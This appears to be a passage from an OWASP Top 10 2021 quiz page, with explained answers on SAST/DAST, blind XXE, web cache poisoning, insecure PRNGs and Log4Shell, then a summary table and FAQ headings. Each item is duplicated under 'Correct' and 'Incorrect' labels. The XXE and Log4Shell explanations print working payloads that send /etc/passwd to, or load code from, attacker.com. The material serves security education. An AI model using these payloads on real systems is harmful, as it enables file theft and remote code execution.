SAST (Static Application Security Testing) analyzes the application's source code, bytecode, or binary without executing it β finding vulnerabilities "from the inside": hardcoded secrets, SQL string concatenation, unsafe deserialization patterns, path traversal, etc. It runs early in SDLC (code review stage). DAST (Dynamic Application Security Testing) attacks the running application like an external hacker β sending malformed requests, fuzzing inputs, manipulating cookies β finding runtime vulnerabilities invisible in source code: authentication bypasses, session management flaws, server configuration issues. Modern DevSecOps integrates both. Tools: SAST (SonarQube, Checkmarx, Semgrep), DAST (OWASP ZAP, Burp Suite, Invicti).
17Exploiting an XXE (XML External Entity) vulnerability via an "Out-of-Band" (OOB) technique is necessary when:
CorrectB: The application does not return the results of the parsed XML entities in its HTTP response, requiring the attacker to force the server to exfiltrate data to an attacker-controlled external server via DNS or HTTP
OOB (Out-of-Band) XXE is needed when the application processes the malicious XML but does not return the entity's value in the HTTP response β making standard (in-band) XXE blind. The attacker uses a malicious DTD hosted externally that declares entities using protocols that cause the server to make outbound connections: <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % oob "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%data;'>"> The server fetches and exfiltrates the file content through DNS or HTTP requests to attacker-controlled infrastructure, visible via Burp Collaborator or interactsh. DNS-based OOB is particularly effective in filtered environments because DNS is rarely blocked outbound.
IncorrectB: The application does not return the results of the parsed XML entities in its HTTP response, requiring the attacker to force the server to exfiltrate data to an attacker-controlled external server via DNS or HTTP
OOB (Out-of-Band) XXE is needed when the application processes the malicious XML but does not return the entity's value in the HTTP response β making standard (in-band) XXE blind. The attacker uses a malicious DTD hosted externally that declares entities using protocols that cause the server to make outbound connections: <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % oob "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%data;'>"> The server fetches and exfiltrates the file content through DNS or HTTP requests to attacker-controlled infrastructure, visible via Burp Collaborator or interactsh. DNS-based OOB is particularly effective in filtered environments because DNS is rarely blocked outbound.
18What is "Web Cache Poisoning"?
CorrectC: An attacker manipulating an application into caching a maliciously crafted HTTP response β injected via unkeyed inputs (headers, cookies) β which is subsequently served to all subsequent legitimate users requesting that cached resource
Web Cache Poisoning (discovered and elaborated by James Kettle at PortSwigger) exploits HTTP caching infrastructure. The key insight: cache keys typically include method, path, and Host header β but other headers (X-Forwarded-Host, X-Forwarded-For, Origin) may influence the response yet be excluded from the cache key ("unkeyed inputs"). An attacker crafts a request with a malicious X-Forwarded-Host header that causes the application to include an attacker-controlled URL in the response (e.g., a JS import). If this response is cached, every subsequent user requesting that URL receives the poisoned response, executing the attacker's JavaScript. This is a complex A05/A03 chained vulnerability.
IncorrectC: An attacker manipulating an application into caching a maliciously crafted HTTP response β injected via unkeyed inputs (headers, cookies) β which is subsequently served to all subsequent legitimate users requesting that cached resource
Web Cache Poisoning (discovered and elaborated by James Kettle at PortSwigger) exploits HTTP caching infrastructure. The key insight: cache keys typically include method, path, and Host header β but other headers (X-Forwarded-Host, X-Forwarded-For, Origin) may influence the response yet be excluded from the cache key ("unkeyed inputs"). An attacker crafts a request with a malicious X-Forwarded-Host header that causes the application to include an attacker-controlled URL in the response (e.g., a JS import). If this response is cached, every subsequent user requesting that URL receives the poisoned response, executing the attacker's JavaScript. This is a complex A05/A03 chained vulnerability.
19Which cryptographic failure occurs when an application uses a Pseudo-Random Number Generator (PRNG) that is not cryptographically secure (e.g., JavaScript's Math.random()) for generating session tokens?
CorrectD: An attacker can mathematically predict both past and future session tokens by statistically analyzing a sample of generated tokens, enabling session forgery
Cryptographically Insecure PRNGs (A02:2021) β like Math.random(), java.util.Random, or Python's random module β use deterministic algorithms with a finite seed state that produces predictable outputs. Unlike CSPRNGs (Cryptographically Secure PRNGs: /dev/urandom, SecureRandom, os.urandom, crypto.randomBytes), these can be analyzed statistically to recover the internal state from a sequence of outputs, allowing prediction of all past and future outputs. An attacker who collects several API-generated token samples can reconstruct the PRNG state and forge valid session tokens for arbitrary users. Always use CSPRNG for session tokens, auth codes, CSRF tokens, and cryptographic keys.
IncorrectD: An attacker can mathematically predict both past and future session tokens by statistically analyzing a sample of generated tokens, enabling session forgery
Cryptographically Insecure PRNGs (A02:2021) β like Math.random(), java.util.Random, or Python's random module β use deterministic algorithms with a finite seed state that produces predictable outputs. Unlike CSPRNGs (Cryptographically Secure PRNGs: /dev/urandom, SecureRandom, os.urandom, crypto.randomBytes), these can be analyzed statistically to recover the internal state from a sequence of outputs, allowing prediction of all past and future outputs. An attacker who collects several API-generated token samples can reconstruct the PRNG state and forge valid session tokens for arbitrary users. Always use CSPRNG for session tokens, auth codes, CSRF tokens, and cryptographic keys.
20The notorious Log4Shell vulnerability (CVE-2021-44228) allowed Remote Code Execution (RCE). In the context of the OWASP Top 10, this is a prime example of chaining which two risk categories?
CorrectB: Vulnerable and Outdated Components (A06) and Injection (A03) β specifically JNDI injection via user-controlled log messages
Log4Shell (CVE-2021-44228, CVSS 10.0) became the most critical vulnerability in years by chaining A06 + A03: (A06 β Vulnerable Component): Apache Log4j 2.0β2.14.1 was a ubiquitous Java logging library used in thousands of enterprise applications. (A03 β Injection): Log4j performed JNDI (Java Naming and Directory Interface) lookups on logged strings. An attacker sent a crafted HTTP header: ${jndi:ldap://attacker.com/exploit}. Log4j logged this, triggered a JNDI lookup to the attacker's LDAP server, which returned a malicious Java class URL, and Log4j downloaded and executed it β achieving RCE on any server running the unpatched version with outbound internet access. The fix was released in Log4j 2.15.0.
IncorrectB: Vulnerable and Outdated Components (A06) and Injection (A03) β specifically JNDI injection via user-controlled log messages
Log4Shell (CVE-2021-44228, CVSS 10.0) became the most critical vulnerability in years by chaining A06 + A03: (A06 β Vulnerable Component): Apache Log4j 2.0β2.14.1 was a ubiquitous Java logging library used in thousands of enterprise applications. (A03 β Injection): Log4j performed JNDI (Java Naming and Directory Interface) lookups on logged strings. An attacker sent a crafted HTTP header: ${jndi:ldap://attacker.com/exploit}. Log4j logged this, triggered a JNDI lookup to the attacker's LDAP server, which returned a malicious Java class URL, and Log4j downloaded and executed it β achieving RCE on any server running the unpatched version with outbound internet access. The fix was released in Log4j 2.15.0.
Conclusion: Mastering OWASP Top 10
These 60 MCQs cover the complete OWASP Top 10 2021 taxonomy β from knowing that Broken Access Control took the #1 spot (found in 94% of applications), through understanding why SSRF is the newest entrant as cloud architectures proliferate, to exploiting advanced chained vulnerabilities like Log4Shell (A06 + A03) and Web Cache Poisoning (A05 + A03).
The key meta-insight: the OWASP Top 10 is organized by root cause, not by attack tool or technique. Broken Access Control is a policy failure. Cryptographic Failures are a protection failure. Injection is a trust-boundary failure. Insecure Design is an architectural failure. Understanding the root cause of each category reveals the correct remediation approach β and why surface-level fixes (WAF rules, input filtering) address symptoms while leaving the root cause in place.
For deeper coverage, explore the full OWASP Top 10 theory notes and complement with the Web Security MCQ library for granular attack/defense mapping at the individual vulnerability level.
Key Takeaways β OWASP Top 10
- A01 Broken Access Control β #1 in 2021, found in 94% of apps. Fix: server-side authorization on every object access.
- A02 Cryptographic Failures β renamed from "Sensitive Data Exposure" to focus on root cause. Use Argon2id for passwords, TLS 1.3 for transport, AES-256 for data at rest.
- A03 Injection β now includes XSS and XXE. Use parameterized queries; never concatenate user input into SQL, OS commands, or templates.
- A04 Insecure Design β new in 2021. Cannot be fixed by patching β requires re-architecture, threat modeling, and security design patterns.
- A05 Security Misconfiguration β open S3 buckets, default credentials, missing headers, verbose errors. Apply CIS Benchmarks and automated CSPM scanning.
- A06 Vulnerable and Outdated Components β Log4Shell, Struts. Maintain an SBOM, automate CVE scanning, pin dependency versions with hash verification.
- A07 Identification and Authentication Failures β enforce MFA, rate limit login endpoints, use CSPRNG for session tokens, check against breached credential databases.
- A08 Software and Data Integrity Failures β verify digital signatures for all updates and dependencies. Avoid deserializing untrusted data.
- A09 Security Logging and Monitoring Failures β average breach dwell time is 207 days without monitoring. Centralize logs, alert on anomalies, test incident response runbooks.
- A10 SSRF β newest category. Implement deny-by-default outbound network policies with strict URL allowlisting. Require IMDSv2 in cloud deployments.
Quick Review β OWASP Top 10 2021 Reference
Use this reference table before or after the questions above to consolidate all 10 categories.
| ID | Category | Key Attack / Flaw | Primary Mitigation |
|---|---|---|---|
| A01 | Broken Access Control | IDOR, Privilege Escalation, BOLA | Server-side authorization on every request |
| A02 | Cryptographic Failures | Plaintext passwords, weak algos, no HTTPS | Argon2id, TLS 1.3, AES-256, HSTS |
| A03 | Injection | SQLi, XSS, OS Command, XXE, SSTI | Parameterized queries, output encoding, CSP |
| A04 | Insecure Design | TOCTOU race conditions, absent threat modeling | Threat modeling (STRIDE), secure design patterns |
| A05 | Security Misconfiguration | Default creds, open S3, missing headers | Hardening standards (CIS), CSPM tools |
| A06 | Vulnerable & Outdated Components | Log4Shell, Struts, Dependency Confusion | SBOM, automated CVE scanning, dependency pinning |
| A07 | Identification & Auth Failures | Credential stuffing, predictable session IDs | MFA, rate limiting, CSPRNG for sessions |
| A08 | Software & Data Integrity Failures | Insecure Deserialization, CI/CD tampering | Digital signatures, avoid deserializing untrusted data |
| A09 | Security Logging & Monitoring Failures | Long breach dwell time, CRLF log injection | SIEM, centralized logging, incident response runbooks |
| A10 | Server-Side Request Forgery (SSRF) | AWS metadata exfiltration, internal scanning | URL allowlisting, deny-by-default egress, IMDSv2 |
Frequently Asked Questions
Q. How many OWASP Top 10 MCQs are on this page?
Q. What are all 10 categories in the OWASP Top 10 2021?
Q. What was new in the OWASP Top 10 2021 edition compared to 2017?
Q. What is the difference between Broken Access Control (A01) and Identification and Authentication Failures (A07)?
Q. Why is Broken Access Control rated #1 in OWASP 2021?
Q. What is the difference between Study Mode and Exam Mode?
Q. Are these MCQs suitable for CEH, CISSP, and CompTIA Security+ exam preparation?
Need the theory? Read the full OWASP Top 10 Theory Guide